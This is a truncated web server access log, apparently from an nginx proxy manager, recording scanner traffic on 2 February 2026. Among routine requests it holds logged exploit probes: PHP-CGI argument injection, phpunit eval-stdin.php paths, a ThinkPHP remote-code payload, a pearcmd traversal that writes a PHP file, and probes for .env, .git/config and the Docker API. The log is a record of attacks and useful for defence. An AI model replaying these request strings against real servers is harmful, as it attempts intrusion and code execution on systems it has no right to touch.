http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:08:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:17:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:21:34 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:23:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[02/Feb/2026:01:23:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/rip.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[02/Feb/2026:01:26:49 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:26:51 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:26:54 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:26:57 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:26:58 +0000] 400 - GET http 78.131.122.113 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:01 +0000] 400 - POST http 78.131.122.113 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:04 +0000] 400 - POST http 78.131.122.113 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:07 +0000] 400 - GET http 78.131.122.113 "/WuEL" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[02/Feb/2026:01:27:11 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:27:12 +0000] 400 - GET http 78.131.122.113 "/a" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:18 +0000] 400 - GET http 78.131.122.113 "/download/file.ext" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:21 +0000] 400 - GET http 78.131.122.113 "/SiteLoader" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:26 +0000] 400 - GET http 78.131.122.113 "/mPlayer" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:32 +0000] 400 - POST http 78.131.122.113 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:27:35 +0000] 400 - GET http 78.131.122.113 "/" [Client 185.91.69.5] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[02/Feb/2026:01:28:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:34:04 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:53:21 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:54:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:56:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[02/Feb/2026:01:56:37 +0000] 400 - - http localhost "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:01:57:52 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:01:02 +0000] 400 - - http localhost "-" [Client 3.143.33.63] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:02:03:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:03:33 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:17:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:02:21:10 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:02:25:44 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:27:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:30:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:49:06 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:51:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:52:50 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[02/Feb/2026:02:55:54 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:02:58:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:01:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:08:07 +0000] 404 - POST http 127.0.0.1 "/GponForm/diag_Form?images/" [Client 221.15.29.126] [Length 122] [Gzip 1.35] "Hello, World" "-" +[02/Feb/2026:03:08:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 221.15.29.126] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:03:10:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[02/Feb/2026:03:15:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:16:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:03:20:27 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:03:27:13 +0000] 404 - GET http 78.131.122.113 "/.env" [Client 162.243.121.238] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[02/Feb/2026:03:27:13 +0000] 404 - GET http 78.131.122.113 "/.git/config" [Client 162.243.121.238] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[02/Feb/2026:03:30:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:31:34 +0000] 200 - GET http 78.131.122.113 "/" [Client 100.52.171.120] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[02/Feb/2026:03:32:49 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:42:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:53:33 +0000] 200 - GET http 78.131.122.113 "/" [Client 103.203.56.3] [Length 1033] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" +[02/Feb/2026:03:55:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:03:57:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 170.64.149.23] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[02/Feb/2026:03:57:57 +0000] 405 - POST http 78.131.122.113 "/" [Client 170.64.149.23] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[02/Feb/2026:03:59:45 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 217.154.38.135] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:03:59:45 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 217.154.38.135] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:03:59:45 +0000] 404 - POST http 78.131.122.113 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 405 - POST http 78.131.122.113 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 217.154.38.135] [Length 154] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:45 +0000] 404 - GET http 78.131.122.113 "/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:46 +0000] 404 - GET http 78.131.122.113 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:47 +0000] 404 - GET http 78.131.122.113 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:48 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:48 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../tmp/index1" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:03:59:48 +0000] 404 - GET http 78.131.122.113 "/containers/json" [Client 217.154.38.135] [Length 150] [Gzip -] "libredtail-http" "-" +[02/Feb/2026:04:02:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:03:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:06:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:13:22 +0000] 200 - GET http 78.131.122.113 "/" [Client 216.218.206.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" "-" +[02/Feb/2026:04:14:17 +0000] 404 - GET http 78.131.122.113 "/webui/" [Client 216.218.206.69] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" "-" +[02/Feb/2026:04:17:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:04:18:47 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:04:20:03 +0000] 404 - GET http 78.131.122.113 "/geoserver/web/" [Client 216.218.206.69] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" "-" +[02/Feb/2026:04:20:11 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:20:36 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:04:31:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:32:36 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:35:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:45:41 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:51:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:04:59:27 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:04:54 +0000] 404 - GET http 78.131.122.113 "/login.asp" [Client 146.19.24.133] [Length 150] [Gzip -] "-" "-" +[02/Feb/2026:05:07:48 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:15:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:05:18:55 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:05:22:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:23:03 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[02/Feb/2026:05:25:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:37:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:39:03 +0000] 200 - GET http 